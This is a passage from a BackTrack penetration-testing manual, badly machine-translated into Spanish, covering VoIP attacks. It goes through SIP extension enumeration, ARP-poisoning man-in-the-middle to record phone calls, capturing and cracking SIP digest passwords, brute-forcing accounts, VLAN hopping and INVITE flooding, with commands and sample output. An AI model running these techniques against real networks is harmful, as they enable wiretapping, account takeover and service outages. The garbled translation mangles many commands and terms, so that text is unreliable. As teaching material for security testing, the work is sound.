. root @ bt :/ pentest / voip / sipvicious # / svwar.py-e100-400 192.168.1.104 m-INVITE-v INFO: TakeASip: tratar de obtener ip auto .. puede tardar un rato INFO: root: iniciar el INFO motores: TakeASip: Ok dispositivo SIP INFO encontrados: TakeASip: extension '200 'existe - requiere autenticación INFO: TakeASip: extension '201' existe - requiere autenticación ----- Edit- --- INFO: TakeASip: extension '203 'existe - requiere autenticación INFO: TakeASip: extension '303' existe - requiere autenticación INFO: TakeASip: extension '303 'existe - requiere autenticación INFO:

Page 66: Manual Backtrack

TakeASip: extension '305' existe - requiere INFO autenticación: root: contamos con 6 extensiones | Extensión | Autenticación | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO: root: Tiempo total: 0:00:21.944731

Enumiax

Enumiax se utiliza para enumerar los nombres de usuario de Asterisk protocolo de Cambio. Permite un ataque de diccionario o un nombre de usuario secuencial Adivinar

root @ bt :/ pentest / voip / enumiax #. / enumiax enumIAX 1,0 Dustin D. Trammell Uso: enumiax [opciones] destino opciones: -D Diccionario ataque con expediente -I Intervalo para auto-save (número de operaciones, por defecto 1000) -M # nombre de usuario mínima (en caracteres) -M # nombre de usuario máximo (en caracteres) -R # límite de velocidad de las llamadas (en microsegundos) -S Leer el estado de sesión de archivo de estado -V verbosidad Incremento (repetición de verbosidad adicional) -V Imprimir información de versión y salir -H help Imprimir / uso de la información y de salida

root @ bt :/ pentest / voip / enumiax #. / enumiax-v-M3-M3 192.168.1.104 enumIAX 1,0 Dustin D. Trammell Objetivo adquirido: 192.168.1.104 Conexión a 192.168.1.104 a través de UDP en el puerto 4569 ... Iniciar el proceso de enumeración en: Jue 05 de febrero 2011 13:04:18 Ahora trabaja en 3 nombres de usuario de caracteres ...

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "000" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "001" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "002" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "003" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "004" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "005" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "006" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "007" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "008" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ...

root @ bt :/ pentest / voip / enumiax #. / enumiax dict-d-v 192.168.1.104 enumIAX 1,0

Page 67: Manual Backtrack

Dustin D. Trammell Objetivo adquirido: 192.168.1.104 Conexión a 192.168.1.104 a través de UDP en el puerto 4569 ... Iniciar el proceso de enumeración en: Jue 05 de febrero 2011 13:02:39

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando de usuario: "guest" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "iaxtel" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "iaxtel2" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando de usuario: "100" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "101" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "200" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "201" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando de usuario: "202" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # Tratando nombre de usuario: "203" Fin del archivo de diccionario alcanzado, salir.

Monitoreo de tráfico y llamadas telefónicas espionaje Supervisar el tráfico de VoIP puede permitir a un atacante capturar las solicitudes de SIP y RTP datos enviados desde los clientes al servidor y viceversa. Se puede servir a dos tipos de ataque:

• La captura de autenticación SIP (que más tarde se discuta este tema en la sección de autenticación atacando). • Usuarios escuchas ilegales llamadas telefónicas.

A efectos de cálculo se utilizará el siguiente escenario:

Para este tipo de ataque que tendrá que realizar un hombre en medio del ataque que se requieren los siguientes pasos:

• Arp intoxicación / spoofing • Oler el tráfico • Decodificación RTP datos a un archivo de audio.

Envenenamiento ARP mediante arpspoof

Antes de que podamos comenzar a rastrear el tráfico tendremos que nuestro veneno arp switch / puerta de enlace, vamos a utilizar una herramienta llamada "arpspoof" que se encuentra en "/ usr / sbin /

Page 68: Manual Backtrack

arpspoof" carpeta en Backtrack, de hecho sólo puede invocarlo desde cualquier lugar, escribiendo: arpspoof Antes de poder utilizar arpspoof tendremos que activar el reenvío IP:

root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward

Sintaxis arpspoof debería tener el siguiente aspecto:

root @ bt: ~ # arpspoof Versión: 2,4 Uso: arpspoof [-i interface] [-t target] anfitrión

Durante un ataque MITM éxito tendremos que suplantar en ambos sentidos:

arpspoof-t víctima de puerta de enlace arpspoof-t gateway víctima

Dejaremos que nuestro envenenamiento ARP ejecutarse en segundo plano mientras se realiza una captura con Wireshark.

La captura de tráfico y espionaje usando Wireshark

Ahora vamos a encender Wireshark para capturar algo de tráfico. Vamos a utilizar el siguiente filtro Wireshark captura:

no transmitir y no multicast y el anfitrión 192.168.1.118

Ahora vamos a empezar a capturar algo de tráfico ... Si bien para olfatear el tráfico de usuario "B" ha puesto en marcha el teléfono X-Lite suave en su computadora de escritorio y marcó el usuario "A" extensión 200.

Wireshark ha capturado algo de tráfico, después de un tiempo me he detenido el proceso de captura y se guarda las sesiones en un archivo llamado "sip.pcap".

Podemos ver que hemos capturado el tráfico SIP, pero para esta sección están más interesados en el tráfico RTP, ya que contiene los datos reales de conversación.

Page 69: Manual Backtrack

Wireshark tiene una característica muy bien para decodificar llamadas VoIP capturados los datos en formato de audio reproducibles Usted puede encontrar esta característica en las estadísticas -> Llamadas VoIP menú.

Voipong

Voipong es una utilidad que detecta todas las llamadas de voz sobre IP en una tubería, y para aquellos que están G711 codificado, los vertederos de conversación real a archivos de onda diferentes. Es compatible con SIP, H323, protocolo de cliente de Cisco Delgado, RTP y RTCP. Voipong se encuentra en retroceso "/ pentest / voip / voipong" directorio Antes de poder utilizar voipong tendremos que hacer algunos cambios en el archivo voipong.conf:

root @ bt :/ pentest / voip / voipong # nano / etc voipong.conf soxpath = / usr / bin / sox networksfile = / pentest / voip / voipong / etc / voipongnets outdir = / pentest / voip / voipong / salida / device = eth0 # su tarjeta de interfaz de red nombre

Ahora podemos empezar a capturar voipong algunas conversaciones VoIP

root @ bt :/ pentest / voip / voipong #. / voipong-c / etc voipong.conf-d4-f

Una vez voipong detecta una llamada de teléfono se iniciará capturarlo una vez que termine de voipong se detendrá el proceso de captura y lo hacen a un fichero wave jugable. Toda la conversación se guardará en el directorio "/ pentest / voip / voipong / salida" carpeta

Reproducción del archivo:

Vomitar

Vomit convierte un teléfono Cisco IP RTP conversación en un archivo de sonido que se puede jugar con los jugadores sanos normales. Vomit requiere un archivo de salida de tcpdump. Con el fin de obtener vomitar en marcha tendremos que descargar e instalar WavePlay Consíguelo aquí: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html

root @ bt: ~ # tar-xzvf WavePlay-20010924.tar.gz WavePlay-20010924 /

Page 70: Manual Backtrack

waveplay-20010924/Makefile waveplay-20010924/waveplay.c waveplay-20010924/waveplay.ja.1 waveplay-20010924/wavefmt.h waveplay-20010924/README waveplay-20010924/waveplay.1 waveplay-20010924/README.jp root @ bt: ~ # cd WavePlay-20010924 root @ bt: ~ / WavePlay-20010924 # make cc-c-o waveplay.o waveplay.c waveplay.o cc-o WavePlay root @ bt: ~ / WavePlay-20010924 # cp WavePlay / usr / bin /

root @ bt :/ pentest / voip / vómito # / vómitos sip.dump r |. WavePlay-S8000-B16-C1

UCsniff

UCSniff es un video de VoIP e IP Seguridad herramienta de evaluación que integra el software de código abierto que existe en varias características útiles, lo que permite VoIP y Video IP propietarios y profesionales de seguridad a prueba rápidamente por la amenaza de espionaje no autorizado VoIP y Video. UCSniff apoya envenenamiento ARP, VLAN Hopping, VLAN descubrimiento a través de CDP, tiene una capacidad de rastreadores y más ... Lo considero como un todo en una herramienta de espionaje. Echemos un vistazo a algunos ejemplos de uso:

UCSniff puede operar en los modos 2

• Modo Monitor - En caso de ser utilizado en un medio compartido donde los teléfonos IP conectados a saber: un HUB, punto de acceso inalámbrico, se puede también utilizar en un entorno conmutado mediante el establecimiento de una sesión SPAN en un switch Cisco. • Hombre en el modo medio - Este modo tiene 2 modos adicionales que son

• Modo de aprendizaje • Modo Dirigido

Preparación UCSniff por lo que puede ejecutar desde cualquier lugar de dar marcha atrás:

root @ bt :/ tmp # cd / pentest / voip / ucsniff / root @ bt :/ pentest / voip / ucsniff #. / configure root @ bt :/ pentest / voip / ucsniff # make root @ bt :/ pentest / voip / ucsniff # make install

Modo de uso del monitor

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-M UCSniff 2,1 de partida Funcionamiento en modo monitor El archivo de directorio users.txt no puede ser abierto para lectura en el directorio de trabajo Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo Escuchando en eth0 ... (Ethernet) eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2

Page 71: Manual Backtrack

A partir Unificado oler ... Advertencia: Asegúrese de que usted golpea 'q' cuando haya terminado con este programa. Advertencia: 'q' re-ARP a las víctimas. Si no lo hace antes de la salida del programa dará lugar a una denegación de servicio.

SIP llamada en curso. (Extensión 200, ip 192.168.1.104) llamando al (extensión 201, ip 192.168.1.118) SIP llamada en curso. (Extensión 200, ip 192.168.1.105) llamando al (extensión 201, ip 192.168.1.104) SIP Call terminado. Conversación grabada en el archivo '200-Calling-201-5 :2:7-3-dos. Wav ' SIP Call terminado. Conversación grabada en el archivo '200-Calling-201-5 :2:8-2-dos. Wav ' Cierre de interfaz de texto ...

Unificado olfateando se detuvo.

Podemos parar las sesiones pulsando la tecla Q.

Varios archivos han sido creados por UCSniff: Los archivos de registro - Contiene información detallada sobre los archivos PCAP transacciones sip - archivo de captura que se puede ver en Wireshark audio wav - archivos de las conversaciones de audio

root @ bt :/ tmp / ucsniff # ls-l total de 376 -Rw-r - r -. 1 root root 40854 05 de febrero 05:02 200 Calling-201-5 :2:7-3-ambos wav -Rw-r - r -. 1 root root 115818 05 de febrero 05:02 200 Calling-201-5 :2:7-3 pcap -Rw-r - r -. 1 root root 46294 05 de febrero 05:02 200 Calling-201-5 :2:8-2-wav tanto -Rw-r - r -. 1 root root 103940 05 de febrero 05:02 200 Calling-201-5 :2:8-2 pcap -Rw-r - r - 1 root root 278 05 de febrero 05:02 call_detail_log -Rw-r - r - 1 root root 317 05 de febrero 05:02 call_log -Rw-r - r - 1 root root 10063 05 de febrero 05:02 sip.log -Rw-r - r - 1 root root 39073 05 de febrero 05:02 sipdump.pcap -Rw-r - r - 1 root root 0 05 de febrero 05:01 skinny_log

MITM Learning Modo de uso:

Este modo utiliza un protocolo de señalización (SIP, Skinny) para asignar extensiones a un direcciones IP. Puede personalizar los objetivos para interceptar sólo direcciones IP específicas o redes. En el siguiente ejemplo se supone que estamos en el UCSniff VoIP VLAN Arp envenenar a todos los hosts de la subred.

root @ bt :/ tmp / ucsniff # ucsniff-i eth0 / / / / UCSniff 2,1 escuchar a partir del eth0 ... (Ethernet) eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2 Asignaron al azar a 255 hosts para la digitalización de ... El escaneo de la máscara de red total para 255 hosts ... * | ================================================ ==> | 100,00% víctimas de envenenamiento ARP: Grupo 1: Cualquier grupo (todos los hosts de la lista) 2: ANY (todos los hosts de la lista) entrada asignada nuevo objetivo: (IP: 192.168.1.118) -> Extensión 201 y nombre: entrada asignada nuevo objetivo: (IP: 192.168.1.104) -> Extensión 200 y nombre: Llamada SIP en curso. (Extensión 201, ip 192.168.1.118) llamando al (extensión 200, ip 192.168.1.104) SIP Llamada finalizada. Conversación grabada en el archivo '201-Calling-200-5 :13:4-2-dos. Interfaz wav 'Clausura de texto ... ARP envenenador desactivado. RE-ARPing las víctimas ... Unificado olfateando se detuvo.

Page 72: Manual Backtrack

Si echamos un vistazo a los archivos de registro UCSniff podemos ver los objetivos descubiertos utilizados en el ataque.

root @ bt :/ tmp / ucsniff # cat targets.txt 192.168.1.118,201, sip 192.168.1.104,200, sip

MITM modo de objetivo

Target Mode permite espionaje en una capa superior que sólo corrientes aleatorias de audio o la dirección IP de los teléfonos para los que no conocen la extensión. Este modo tiene dos modos secundarios: El usuario Targeted Targeted Conversación Podemos agregar destinos manualmente a la "targets.txt" archivo en el siguiente formato: xxxx, extensión, sip 192.168.1.118,201, SIP o utilizar el modo de aprendizaje para el descubrimiento automático hosts

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T UCSniff 2,1 de partida Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo No hay objetivos han sido previamente descubierto en el archivo Targets, targets.txt Por favor, ejecute UCSniff en el modo de aprendizaje, o manualmente editar targets.txt

Una vez que un archivo válido targets.txt se encuentra, se le pedirá que seleccione un modo de escucha:

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T UCSniff 2,1 de partida Analizados 2 entradas en el archivo Targets, targets.txt UCSniff ejecuta en modo de destino. Analizada 2 objetivos previamente descubiertos Por favor, seleccione un modo de espionaje dirigida: 1. Usuario Descripción: interceptar todas las llamadas desde o hacia un punto final determinado. 2. Conversación Descripción: espiar a los flujos de conversación bidireccional entre dos puntos finales seleccionados. Por favor, seleccione la opción (1) o (2):

Si selecciona "Usuario" indica a la herramienta para interceptar todo el tráfico entre el Blanco, y el resto de la red.

En "Conversación", dos puntos finales se seleccionan y la red es ARP envenenada para interceptar sólo el tráfico entre los dos usuarios.

UCSniff incluye las herramientas más útiles y los ataques de los modos como el salto de VLAN (usando ACE) que se discutirán más adelante.

Page 73: Manual Backtrack

Xplico

Aunque Xplico no está en el directorio Backtrack voip herramientas, es una herramienta muy útil para capturar tráfico SIP y RTP (entre otros protocolos). Xplico se puede encontrar en el Backtrack -> Digital Forensics - menú Herramientas> Análisis Forense

En caso de que no esté presente en la instalación Backtrack sólo tiene que instalar con el comando siguiente:

root @ bt: ~ # apt-get install xplico

Xplico se puede utilizar para capturar tráfico en tiempo real o importar un archivo PCAP Wireshark captura. De cualquier manera Xplico decodificará los paquetes capturados y les montamos en el formato adecuado en nuestro caso será SIP y RTP. Después de ejecutar Xplico le pedirá que inicie sesión, el nombre de usuario y contraseña por defecto son: xplico

Una vez que haya iniciado sesión para Xplico tendremos que crear un caso

Tendremos que elegir entre una captura vivo o importar un archivo PCAP En este ejemplo vamos a utilizar Xplico para realizar una captura en vivo (vamos a Arp envenenar nuestros objetivos en segundo plano usando arpspoof). Ahora tendremos que elegir nuestro caso y crear una nueva sesión

Al elegir nuestra sesión recién creada veremos nuestra página de estadísticas principal con la opción de elegir nuestro adaptador de red e iniciar / detener el proceso de captura.

Aquí hay un ejemplo para el tráfico capturado SIP:

Un ejemplo para el tráfico RTP decodificado:

La captura de autenticación SIP utilizando SIPDump

SIPDump es parte de la suite de herramientas SIPCrack, permite realizar una captura en vivo de autenticación SIP respuesta digest o puede volcar una sesión previamente capturados desde un archivo

Page 74: Manual Backtrack

PCAP. SIPDump uso:

root @ bt :/ pentest / voip / sipcrack #. / sipdump-i eth0 SIPdump 0,3 (MaJoMu | www.codito.de) --------------------------------------- Uso: sipdump [OPCIONES] = Archivo donde logins capturados se escribirá en Opciones: -I = Interfaz para escuchar en -P = Pcap utilizar el archivo de datos -M = introducir manualmente los datos de acceso -F " "= Conjunto libpcap filtro * Es necesario especificar el archivo de volcado

Vivo para capturar con SIPDump:

root @ bt :/ pentest / voip / sipcrack #. / sipdump-i eth0 auth.txt SIPdump 0,3 (MaJoMu | www.codito.de) --------------------------------------- * El uso de 'eth0' dev para oler * Empieza a oler con 'tcp o udp o vlan' filtro de paquetes * Dumped inicio de sesión desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ') * Dumped inicio de sesión desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ') * Dumped inicio de sesión desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')

Dumping datos de autenticación de un archivo PCAP

root @ bt :/ pentest / voip / sipcrack #. / sipdump-p / root / registration.pcap auth.txt SIPdump 0,3 (MaJoMu | www.codito.de) --------------------------------------- * El uso de pcap file '/ root / registration.pcap' para oler * Empieza a oler con 'tcp o udp o vlan' filtro de paquetes * Dumped inicio de sesión desde 192.168.1.104 -> 192.168.1.101 (Usuario: '200 ') * Al salir, olfateó un inicio de sesión

SIPDump a escribir la respuesta al desafío de autenticación en el archivo especificado que se ve de la siguiente manera:

Vamos a disscuss agrietamiento estos desafíos en el capítulo autenticación contrario.

Atacar autenticación SIP puede ser susceptible a dos tipos de ataques de autenticación, antes de echar un vistazo a estos ataques tipo vamos a entender cómo es un registro SIP y el proceso de autenticación se lleva a cabo. SIP utiliza una autenticación implícita que es un mecanismo que utiliza el protocolo HTTP y conocido como HTTP digest. Debido a que SIP es un protocolo basado en ASCII los detalles de autenticación son ordenadas con el fin de evitar el transporte en texto claro. Cuando un cliente SIP (User Agent) quiere autenticar con un servidor SIP, el servidor genera y envía un desafío digest al cliente, que contiene los siguientes parámetros:

Page 75: Manual Backtrack

Realm - se usa para identificar las credenciales dentro como mensaje SIP, por lo general es el dominio SIP Nonce -. Esto es una cadena md5 único que es generado por el servidor para cada solicitud de registro que está hecho de un sello de tiempo y una frase secreta para asegurar tiene una vida útil limitada y no se podía ser utilizado de nuevo. Una vez que el cliente recibe el desafío digest y el usuario introduce sus credenciales el cliente utiliza el nonce para generar una respuesta digest y lo envía de vuelta al servidor.

Dicho esto, vamos a tratar de descifrar la respuesta digest con el fin de obtener una contraseña válida de SIP cuenta.

Cracking SIP Digest hashes respuesta

Backtrack ofrece una gran herramienta llamada SIPCrack, Ya hemos discutido cómo capturar una autenticación válida SIP compendio de respuestas utilizando SIPDump. SIPCrack se puede encontrar en

root @ bt :/ pentest / voip / sipcrack #

SIPCrack uso:

root @ bt :/ pentest / voip / sipcrack #. / sipcrack SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------- Uso: sipcrack [opciones] [-s |-w ] Logins = Archivo que contiene olfateó por Opciones SIPdump:-s = stdin uso de contraseñas lista de palabras-w = archivo que contiene todas las contraseñas a probar-p num = proceso de impresión de craqueo contraseñas cada n (-w) (ATENCIÓN: se ralentiza en gran medida) * O -w o-s tiene que ser dada

SIPCrack puede funcionar en dos modos:

• Ataque de diccionario • STDIN

Ataque de diccionario

Backtrack ofrece algunos diccionarios básicos que se encuentran en:

root @ bt :/ pentest / passwords / listas de palabras

Sin embargo, para el propósito de este artículo voy a utilizar otra herramienta en la parrilla Crunch retroceder llamada que se utiliza para crear diccionarios personalizados. Vamos a utilizar para crear un crujido crujido seis caracteres numéricos diccionario se encuentra en:

Page 76: Manual Backtrack

root @ bt :/ pentest / passwords / crunch #

Crunch de uso:

uso: crunch [-F / ruta / a / charset.lst charset-name] [-o wordlist.txt] [-t [FIXED] @ @ @ @] [-s Startblock] [-c número]

Para el uso crujido detallado comprobar su manual:

root @ bt :/ pentest / passwords / crunch crunch hombre #

Creación de un diccionario de seis caracteres numéricos:

root @ bt :/ pentest / passwords / crunch #. / crunch 6 6-f charset.lst numérico-o / pentest / voip / sipcrack / sipass.txt Crunch generará ahora 7000000 bytes de datos Crunch ahora generará 6 MB de datos Crunch ahora genera 0 GB de datos 100%

Vamos a utilizar un credenciales previamente capturados por SIPDump sip almacenados en el archivo auth.txt ans sipass.txt como diccionario (que hemos creado utilizando crunch)

Descifrando la respuesta Digest:

root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w auth.txt sipass.txt SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------- * Se encuentra Cuentas: Num Cliente Servidor Hash usuario | contraseña 1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd * Seleccione la entrada de roer (1 - 1): 1 * Generación de hash MD5 estática ... 0a84f78fde66bb15197eab961462dc2f * A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd') * Lista de palabras Cargado: 'sipass.txt' * A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd') * Se ha intentado 123457 contraseñas en 0 segundos

* Contraseña Encontrados: '123456 ' * Actualización del archivo de volcado 'auth.txt' ... hecho

Ataque de fuerza bruta con John The Ripper

Para este modo de ataque que usaremos John the ripper para redirigir la salida johns en el archivo FIFO que vamos a alimentar a SIPCrack. Creación de un archivo FIFO:

root @ bt :/ tmp # mkfifo sipcrack

Page 77: Manual Backtrack

Generando contraseñas usando john y redirigir la salida a nuestro fichero FIFO, para este ejemplo vamos a generar hasta 6 dígitos solamente.

root @ bt: ~ # john [*] Este script le llevará a / pentest / passwords / jtr / [*] A partir de ahí, ejecute. / John root @ bt :/ pentest / passwords / JTR # / john -. incremental = dígitos-stdout = 6> / tmp / sipcrack

Utilizando el archivo FIFO para romper la clave:

root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w / tmp / sipcrack auth.txt SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------- * Se encuentra Cuentas: Num Cliente Servidor Hash usuario | contraseña 1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968 * Seleccione la entrada de roer (1 - 1): 1 * Generación de hash MD5 estática ... 0a84f78fde66bb15197eab961462dc2f * A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968') * Lista de palabras Cargado: '/ tmp / sipcrack' * A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968') * Se ha intentado tres contraseñas en 0 segundos * Contraseña Encontrados: '123456 ' * Actualización del archivo de volcado 'auth.txt' ... hecho

Ataques de fuerza bruta SIP Cuentas

Podemos utilizar svcrack que forma parte de la suite de herramientas sipvicious a la fuerza bruta sorbo representa una única cuenta SIP ataque de diccionario (Usted puede agregar un v-o-vv para mostrar más información):

root @ bt :/ pentest / voip / sipvicious #. / svcrack.py-u200-d 192.168.1.104 wordlist.txt | Extensión | Contraseña | ------------------------ | 200 | 123456 |

Una sola cuenta SIP bruta obligando a:

root @ bt :/ pentest / voip / sipvicious #. / svcrack.py-u200-r100000-999999 192.168.1.104 | Extensión | Contraseña | ------------------------ | 200 | 123456 |

Usar. / Svcrack-h para todos los argumentos disponibles.

VLAN Hopping Por lo general, el tráfico de VoIP se conecta a una VLAN dedicada (Virtual LAN), como vimos en la sección topologías. Esto significa que no se puede interceptar el tráfico de VoIP por inhalación e

Page 78: Manual Backtrack

intoxicación Arp. La razón de ello es que una VLAN es como una red independiente, tiene su propio dominio de broadcast y rango de IP diferente a la red de datos. VLAN salto es una forma de "saltar" a otra VLAN, por suerte para nosotros Backtrack incluye las herramientas necesarias para llevar a cabo este ataque. Una topología común es cuando el teléfono IP tiene un built-in "Switch interno", por lo general el PC está conectado a la toma PC y el teléfono móvil se conecta desde su lan / sw socket con el conmutador de red de la siguiente manera:

Un conmutador CISCO típica configuración de puertos para VoIP se verá algo como:

Switch # conf t Introduzca los comandos de configuración, uno por línea. Terminar con CTRL / Z. Switch (config) # interface FastEthernet 0/1 Switch (config-if) # switchport modo de acceso Switch (config-if) # switchport access vlan 10 Switch (config-if) # switchport voz vlan 20

El teléfono IP se configurará con la ID de VLAN correspondiente (20) y el tráfico de datos PC fluirá a través de la VLAN 10. Antes de comenzar saltando alrededor, tendremos que activar el soporte para el protocolo 802.1q en Backtrack escribiendo:

root @ bt: ~ # modprobe 8021q

VoIP Hopper

VoIP tolva se utiliza para saltar a la VLAN de voz por comportarse como un teléfono IP, soporta conmutadores específicos y es compatible con algunos modelos de teléfonos IP. Actualmente soporta las marcas como: Cisco, Avaya y Nortel. VoIP tolva fue diseñado para ejecutarse en Backtrack Linux y actualmente cuenta con las siguientes características: DHCP Client, generador de CDP, la suplantación de direcciones MAC y VLAN salto. Voiphopper uso:

root @ bt :/ pentest / voip / voiphopper #. / voiphopper voiphopper-i <interface>-c {0 | 1 | 2}-a-n-v <VLANID> Por favor, especifique una opción de modo de base: CDP Sniff Mode (-c 0) Ejemplo: voiphopper-i eth0-c 0 CDP Spoof modo de paquete personalizado (-c 1): -D (ID de dispositivo) -P (Port ID) -C (Capacidades) -L (Plataforma) -S (Software) -U (Duplex) Ejemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Port 1' Host-C-L 'Cisco IP Phone 7940'-S 'P003-08-8-00-1-U CDP Spoof modo de pre-hechos paquetes (-c 2) Ejemplo: voiphopper-i eth0-c 2 Avaya modo DHCP Opción (-a):

Page 79: Manual Backtrack

Ejemplo: voiphopper-i eth0-a Modo VLAN Hop (-v ID de VLAN): Ejemplo: voiphopper-i eth0-v 200 Nortel modo DHCP Opción (-n): Ejemplo: voiphopper-i eth0-n

• VoIP Hopper ofrece muchos modos de ataque por favor utiliza el h-para obtener información detallada.

Echemos un vistazo a un ejemplo de la inhalación de CDP y ejecutar un salto de VLAN en la VLAN de voz en un entorno de Cisco. Ejecutar VoIP Hopper en la interfaz de Ethernet, de la siguiente manera:

root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-c 0

VoIP Hopper también le permite a uno Hop VLAN a VLAN arbitraria, sin oler a CDP. Si usted ya conoce la voz VLAN ID o le gustaría Hop VLAN a otra VLAN sólo tiene que especificar el ID de VLAN.

root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-v 20 VoIP Hopper 1,00 Ejecución en modo VLAN Hop ~ Tratar de saltar a la VLAN 2 Añadido VLAN 20 a la interfaz eth0 Intentando dhcp solicitud de nueva interfaz eth0.20

eth0.20 Enlace encap: Ethernet HWaddr 00:0 c: 29:84:98: b2 inet6 addr: fe80 :: 20c: 29ff: FE84: 98b2/64 Alcance: Enlace UP NOTRAILERS BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1 RX packets: 0 errores: 0 caído: 0 sobrecostos: 0 frame: 0 TX paquetes: 9 errores: 0 caído: 0 sobrecostos: 0 carrier: 0 colisiones: 0 txqueuelen: 0 RX bytes: 0 (0.0 B) TX bytes: 2274 (2.2 KB)

ACE

ACE es una herramienta más para VLAN salto muy similar a Voiphopper en el uso e incluyen una opción para descubrir también los servidores de TFTP (servidores de configuración). ACE uso:

root @ bt :/ pentest / voip / as #. / as ACE v1.0: Automated corporativa (Datos) Enumerator Uso: as [-i interface] [-m mac address] [-t servidor tftp dirección ip |-c modo cdp |-v voz vlan id |-r interfaz vlan |-d modo verbose] -I <interface> (Obligatorio) Interfaz para olfatear / envío de paquetes -M MAC> (Obligatorio) Dirección MAC del teléfono IP víctima -T <tftp servidor ip> (Opcional) Servidor tftp dirección IP -C <cdp modo 0|1> (opcional) 0 CDP oler modo, un modo de parodia CDP -V <Voice vlan <id (Opcional) Introduzca la ID de VLAN de voz -R <vlan usuario> (opcional) Elimina la interfaz VLAN -D (Opcional) verbose | modo de depuración

Page 80: Manual Backtrack

Puede agregar manualmente un salto de VLAN o utilizar su función de descubrimiento

Modo para especificar el ID de VLAN de voz Ejemplo: As-i eth0-v 96 m 00:1 E: F7: 28:9 C: 8E

Modo para auto-descubrir ID VLAN de voz en el modo de audición para CDP Ejemplo: As-i eth0-c 0-m 00:1 E: F7: 28:9 C: 8E

Modo para auto-descubrir ID VLAN de voz en el modo de suplantación para CDP Ejemplo: As-i eth0-c 1-m 00:1 E: F7: 28:9 C: 8E

TIP: Para ver la dirección MAC en uso marcha atrás:

root @ bt: ~ # macchanger-s eth0

No importa si se ha utilizado o voiphopper as ahora se puede interceptar el tráfico de VoIP con herramientas como "ucsniff" especificando que acaba de crear la interfaz.

Por ejemplo:

root @ bt :/ pentest / voip / ucsniff # ucsniff-i eth0.20 / / / /

Denial Of Service Un ataque de denegación de servicio en los servicios de VoIP puede hacerlo inútil, causando un daño intencional a la red y la disponibilidad de los sistemas de VoIP. Este ataque puede ocurrir en dos niveles, ataques de red estándar DoS y ataques específicos de VoIP DOS. Generalmente se enviará toneladas de datos por la inundación de la red para consumir todos sus recursos o un protocolo específico con el fin de saturar con toneladas de peticiones. Vamos a echar un vistazo rápido de las herramientas disponibles en Backtrack

Inviteflood

Esta herramienta puede ser utilizada para inundar un objetivo con peticiones INVITE puede ser utilizada para combatir gateways SIP / apoderados y teléfonos SIP.

root @ bt :/ pentest / voip / inviteflood #. / inviteflood inviteflood - Versión 2.0 09 de junio 2006 Uso: Obligatorio - interfaz (por ejemplo eth0) usuario de destino (por ejemplo, "" o john.doe o 5000 o "1 +210-555-1212") dominio de destino (por ejemplo enterprise.com o una dirección IPv4) IPv4 addr objetivo de inundación (ddd.ddd.ddd.ddd) inundación etapa (es decir, número de paquetes) Opcional - -Una inundación herramienta "De:" alias (por ejemplo jane.doe)

Page 81: Manual Backtrack

I-IPv4 dirección IP de origen [por defecto es la dirección IP de la interfaz] -S srcport (0 - 65535) [por defecto es bien conocido puerto de descarte 9] -D DestPort (0 - 65535) [por defecto es bien conocido puerto SIP 5060] -L En lineString utilizado por SNOM [por defecto está en blanco] -S tiempo de sueño msgs btwn invitar (us) -H help - imprime este uso -V modo detallado salida

Una sintaxis de uso básico es el siguiente:

. / Inviteflood eth0 target_extension target_domain target_ip number_of_packets

